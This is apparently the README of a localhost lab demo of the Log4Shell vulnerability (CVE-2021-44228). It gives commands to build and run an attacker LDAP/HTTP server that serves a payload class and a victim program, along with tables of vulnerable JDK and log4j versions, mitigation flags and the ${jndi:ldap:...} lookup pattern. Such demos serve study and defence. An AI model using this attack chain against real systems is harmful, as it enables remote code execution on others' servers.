A short demo of CVE-2021-44228
$ mvn clean verify
$ java \
-cp 'attacker/target/sample-attacker.jar:attacker/target/lib/*' \
sample.attacker.Attacker localhost 1389 sample.payload.Payload 8080 payload/target/sample-payload.jar
URLs:
http://localhost:8080/http://localhost:8080/sample/payload/Payload.class
$ java \
-cp 'victim/target/sample-victim.jar:victim/target/lib/*' \
sample.victim.Victim
| Version | Status |
|---|---|
Oracle JDK 8u5 |
vulnerable |
OpenJDK 8u312 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
IBM OpenJDK 8u312-b07 (OpenJ9) |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
OpenJDK 11.0.7+10 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
OpenJDK 11.0.13+8 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
OpenJDK 16+36 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
OpenJDK 17+35 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
OpenJDK 17.0.1+12 |
NOT vulnerable (unless -Dcom.sun.jndi.ldap.object.trustURLCodebase=true) |
If NOT vulnerable, an instance of javax.naming.Reference is returned from javax.naming.Context.lookup().
If NOT vulnerable to loading classes from remote code bases, other Java deserialization vulnerabilities probably still exist!
| Version | Status |
|---|---|
2.9.1 |
vulnerable |
2.10.0 |
vulnerable (unless -Dlog4j2.formatMsgNoLookups=true or environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true) |
2.14.1 |
vulnerable (unless -Dlog4j2.formatMsgNoLookups=true or environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true) |
2.15.0 |
NOT vulnerable |
If NOT vulnerable, ${jndi:ldap:...} is NOT resolved.